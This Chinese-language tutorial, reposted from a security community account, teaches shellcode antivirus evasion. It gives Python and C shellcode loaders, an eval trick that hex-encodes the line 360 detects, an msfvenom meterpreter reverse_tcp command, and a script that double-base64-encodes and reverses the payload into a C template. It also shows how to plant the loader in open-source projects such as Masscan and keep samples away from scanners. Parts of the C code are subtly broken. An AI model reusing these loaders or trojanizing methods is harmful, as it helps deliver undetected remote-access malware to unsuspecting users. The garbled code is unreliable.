本文是 i 春秋论坛作家「Avic」表哥分享的技术文章,公众号旨在为大家提供更多的学习方法与技能技巧,文章仅供学习参考。
Shellcode免杀基础教程
Shellcode执行工具编写思路
首先利用一段Python的源代码,给大家分析怎么写shellcode执行盒。
import ctypes
shellcode = """"""
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(shellcode)))
ht=ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))引入ctypes模块,接着将shellcode代码赋值给变量hex解码,(MSF或Cs生成的之后,使用编码工具手动编码一次)转换为字节数组。
然后,使用ctypes,调用windows自带的dll,也就是Kernel32,使用VirtualAlloc函数,分配内存,返回分配的首地址。
再使用RtlMoveMemory,将shellcode拷贝到目标内存。使用CreateThread创建一个线程,使用WaitForSingleObject执行内存。
总之,就是调用Kernel32.dll中的函数来编写Shellcode执行工具,不止这一种方法。作者水平有限,请勿断章取义。
编写Shellcode执行工具
为了验证前面的思路是正确的,在用其他语言来验证一下。这里,我们使用易语言吧,尽可能让大家看懂编写过程。
新建一个windows窗口程序
画一个界面出来,大概就这样。
双击按钮来到添加事件,来到编辑界面。添加一个精易模块,等会要用他里面的方法来编写shellcode,创建shellcode变量,用来储存shellcode。
查看模块手册,就会发现模块自带VirtualAlloc RtlMoveMemory CreateThread WaitForSingleObject这四个方法,我们直接使用即可。
最终编写如下,如果你仔细比对Python源代码,你会发现真的基本上就是差不多的。
最后,让我们来测试一下吧。
MSF生成一个小弹窗测试一下。
使用一下K8飞刀的编码工具
获得编码以后的shellcode
获得HEx编码的Shellcode,复制粘贴到加载测试工具中,点击加载shellcode。
Shellcode上线免杀思路
用Python Ruby这类解释型语言,打包成EXE就算是正常程序也很有可能被拦截,而像C和GO以及C++这种编译型语言则不会有这种问题。建议各位免杀,放在虚拟机,并且断网防止被上传。也不要上传VT等杀毒网站,会被厂商拿去分析的。免杀的时候也不要上传到类似于360的云查杀。
下面我来叙述一下我的思路:
首先,我给出一段免杀360与火绒的Python加载器源代码。细心的小伙伴们可能会发现,这跟上面第一部分我给出的源代码很像。对的,这个就是在那个基础上运用了一下加密手段,来进行免杀的。
使用hex将,360查杀的部分给藏了起来。在运行的时候,首先解密字符串,然后eval执行,运用了等价替换的思路。
问题来了,我为什么知道360查杀这里?
这里给大家一个小方法,那就是不断的FUzz。像下文这段代码,我发现去掉
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(shellcode))),
然后打包成exe,360则不查杀,就是不断的去尝试,最后知道他查杀哪里。
import ctypes
a = "shellcode"
shellcode=bytearray(a.decode("hex"))
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
shell = "6374797065732e77696e646c6c2e6b65726e656c33322e52746c4d6f76654d656d6f7279286374797065732e635f696e7428707472292c206275662c206374797065732e635f696e74286c656e287368656c6c636f6465292929"
eval(shell.decode("hex"))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))第二个思路,使用一些正常的开源项目,在里面加点料,达到免杀。经过本人不断地测试,发现效果属实顶。VT查杀轻轻松松可以控制在8左右。而且,相对于第一个思路来说,也更加容易,适合新手朋友。
这里给出效果图,使用的是Masscan。
稍微给Masscan加了点料
Shellcode免杀实战
首先,去github上随手一搜索C写的程序,然后下载到本地,打开。我这里用的是vs2019,你们也可以用其他的,没有硬性要求。
第一,这里准备两个东西,一个是base64加密解密的code,另外一个是反转字符串的code。
第二,找开源程序的时候,注意文件大小,太小的效果不好,太大的又臃肿,几百K左右也可以,但是其实也没有那么大的硬性要求。
static const unsigned char pr2six[256] =
{
/* ASCII table */
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 62, 64, 64, 64, 63,
52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 64, 64, 64, 64, 64, 64,
64, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14,
15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 64, 64, 64, 64, 64,
64, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64
};
int Base64decode_len(const char* bufcoded)
{
int nbytesdecoded;
register const unsigned char* bufin;
register int nprbytes;
bufin = (const unsigned char*)bufcoded;
while (pr2six[*(bufin++)] <= 63);
nprbytes = (bufin - (const unsigned char*)bufcoded) - 1;
nbytesdecoded = ((nprbytes + 3) / 4) * 3;
return nbytesdecoded + 1;
}
int Base64decode(char* bufplain, const char* bufcoded)
{
int nbytesdecoded;
register const unsigned char* bufin;
register unsigned char* bufout;
register int nprbytes;
bufin = (const unsigned char*)bufcoded;
while (pr2six[*(bufin++)] <= 63);
nprbytes = (bufin - (const unsigned char*)bufcoded) - 1;
nbytesdecoded = ((nprbytes + 3) / 4) * 3;
bufout = (unsigned char*)bufplain;
bufin = (const unsigned char*)bufcoded;
while (nprbytes > 4) {
*(bufout++) =
(unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4);
*(bufout++) =
(unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2);
*(bufout++) =
(unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]);
bufin += 4;
nprbytes -= 4;
}
/* Note: (nprbytes == 1) would be an error, so just ingore that case */
if (nprbytes > 1) {
*(bufout++) =
(unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4);
}
if (nprbytes > 2) {
*(bufout++) =
(unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2);
}
if (nprbytes > 3) {
*(bufout++) =
(unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]);
}
*(bufout++) = '�';
nbytesdecoded -= (4 - nprbytes) & 3;
return nbytesdecoded;
}
static const char basis_64[] =
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
int Base64encode_len(int len)
{
return ((len + 2) / 3 * 4) + 1;
}
int Base64encode(char* encoded, const char* string, int len)
{
int i;
char* p;
p = encoded;
for (i = 0; i < len - 2; i += 3) {
*p++ = basis_64[(string >> 2) & 0x3F];
*p++ = basis_64[((string & 0x3) << 4) |
((int)(string[i + 1] & 0xF0) >> 4)];
*p++ = basis_64[((string[i + 1] & 0xF) << 2) |
((int)(string[i + 2] & 0xC0) >> 6)];
*p++ = basis_64[string[i + 2] & 0x3F];
}
if (i < len) {
*p++ = basis_64[(string >> 2) & 0x3F];
if (i == (len - 1)) {
*p++ = basis_64[((string & 0x3) << 4)];
// *p++ = '=';
}
else {
*p++ = basis_64[((string & 0x3) << 4) |
((int)(string[i + 1] & 0xF0) >> 4)];
*p++ = basis_64[((string[i + 1] & 0xF) << 2)];
}
//*p++ = '=';
}
*p++ = '�';
return p - encoded;
}
string_change(unsigned char* p) {
int i, len;
char temp;
len = strlen(p);
for (size_t i = 0; i < (len / 2); i++)
{
temp = p[i];
p[i] = p[len - 1 - i];
p[len - 1 - i] = temp;
}
}MSF生成代码
msfVENOM -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b 'x00' lhost=192.168.132.128 lport=4444 -f c -o shell.c
这里用一下base.py处理一下文件
import base64,sys
text = """#include <string.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
//windows控制台程序不出黑窗口
static const unsigned char pr2six[256] =
{
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 62, 64, 64, 64, 63,
52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 64, 64, 64, 64, 64, 64,
64, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14,
15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 64, 64, 64, 64, 64,
64, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64
};
int Base64decode_len(const char* bufcoded)
{
int nbytesdecoded;
register const unsigned char* bufin;
register int nprbytes;
bufin = (const unsigned char*)bufcoded;
while (pr2six[*(bufin++)] <= 63);
nprbytes = (bufin - (const unsigned char*)bufcoded) - 1;
nbytesdecoded = ((nprbytes + 3) / 4) * 3;
return nbytesdecoded + 1;
}
int Base64decode(char* bufplain, const char* bufcoded)
{
int nbytesdecoded;
register const unsigned char* bufin;
register unsigned char* bufout;
register int nprbytes;
bufin = (const unsigned char*)bufcoded;
while (pr2six[*(bufin++)] <= 63);
nprbytes = (bufin - (const unsigned char*)bufcoded) - 1;
nbytesdecoded = ((nprbytes + 3) / 4) * 3;
bufout = (unsigned char*)bufplain;
bufin = (const unsigned char*)bufcoded;
while (nprbytes > 4) {
*(bufout++) =
(unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4);
*(bufout++) =
(unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2);
*(bufout++) =
(unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]);
bufin += 4;
nprbytes -= 4;
}
/* Note: (nprbytes == 1) would be an error, so just ingore that case */
if (nprbytes > 1) {
*(bufout++) =
(unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4);
}
if (nprbytes > 2) {
*(bufout++) =
(unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2);
}
if (nprbytes > 3) {
*(bufout++) =
(unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]);
}
*(bufout++) = '\0';
nbytesdecoded -= (4 - nprbytes) & 3;
return nbytesdecoded;
}
static const char basis_64[] =
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
int Base64encode_len(int len)
{
return ((len + 2) / 3 * 4) + 1;
}
int Base64encode(char* encoded, const char* string, int len)
{
int i;
char* p;
p = encoded;
for (i = 0; i < len - 2; i += 3) {
*p++ = basis_64[(string >> 2) & 0x3F];
*p++ = basis_64[((string & 0x3) << 4) |
((int)(string[i + 1] & 0xF0) >> 4)];
*p++ = basis_64[((string[i + 1] & 0xF) << 2) |
((int)(string[i + 2] & 0xC0) >> 6)];
*p++ = basis_64[string[i + 2] & 0x3F];
}
if (i < len) {
*p++ = basis_64[(string >> 2) & 0x3F];
if (i == (len - 1)) {
*p++ = basis_64[((string & 0x3) << 4)];
// *p++ = '=';
}
else {
*p++ = basis_64[((string & 0x3) << 4) |
((int)(string[i + 1] & 0xF0) >> 4)];
*p++ = basis_64[((string[i + 1] & 0xF) << 2)];
}
//*p++ = '=';
}
*p++ = '\0';
return p - encoded;
}
string_change(unsigned char* p) {
int i, len;
char temp;
len = strlen(p);
for (size_t i = 0; i < (len / 2); i++)
{
temp = p[i];
p[i] = p[len - 1 - i];
p[len - 1 - i] = temp;
}
}
main(){
unsigned char init_buf[] = "%s";
char kekeoyyds_bufs[1024] = { 0 };
char kekeoyyds_buf[1024] = { 0 };
string_change(init_buf);
Base64decode(kekeoyyds_bufs, init_buf);
Base64decode(kekeoyyds_buf, kekeoyyds_bufs);
char* dmagic_memory;
dmagic_memory = VirtualAlloc(NULL, sizeof(kekeoyyds_buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(dmagic_memory, kekeoyyds_buf, sizeof(kekeoyyds_buf));
}
"""
if __name__ == '__main__':
if len(sys.argv) == 3:
print("开始处理:%s" % sys.argv[1])
with open(sys.argv[1]) as file:
shellcode = ""
for i in file.readlines():
if "unsigned" not in i:
shellcode += i.strip("n").strip("r").strip(";").strip(""")
print(shellcode)
exec('shellcode = b"%s"' % shellcode)
shellcode = base64.b64encode(shellcode)
shellcode = base64.b64encode(shellcode)
shellcode = shellcode.decode("utf8")[::-1]
with open("./"+sys.argv[2],"w+") as shellcodefile:
shellcodefile.write(text % shellcode)
print("处理完毕:%s" % sys.argv[2])
else:
print(sys.argv)
print("python base.py shell.c shellcode.c")
在头部添加一下取消黑色窗口的小东西。
#pragma comment(linker,"/subsystem:"Windows" /entry:"mainCRTStartup"")
将base64编码函数和反转字符串函数一同复制进来。
右键,重新生成,找到bin目录,查看exe。
放到虚拟机测试一下
MSF配置如下:
然后要设置一下EnableStageEncoding为ture
效果如下
总结:shellcode免杀的执行方式不止上述内容,还有很多。有兴趣的同学可以去github上看看https://github.com/TideSec/BypassAntiVirus,看看26到29。
我们上面通过在masscan中植入后门代码来进行免杀,其实就是一个小小的测试。同学们完全可以自己去寻找其他语言开发的代码一样的植入进去。然后通过,反转字符串,xor异或加密,base64加密等等方式来对抗杀软,相互结合使用效果会更好。
今天的文章分享,小伙伴们看懂了吗?
文章素材来源于i春秋社区
文末下方点个赞和在看哦
i春秋官方公众号为大家提供
前沿的网络安全技术
简单易懂的实用工具
紧张刺激的安全竞赛
还有网络安全大讲堂
更多技能等你来解锁
本文始发于微信公众号(i春秋):Shellcode免杀基础教程
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论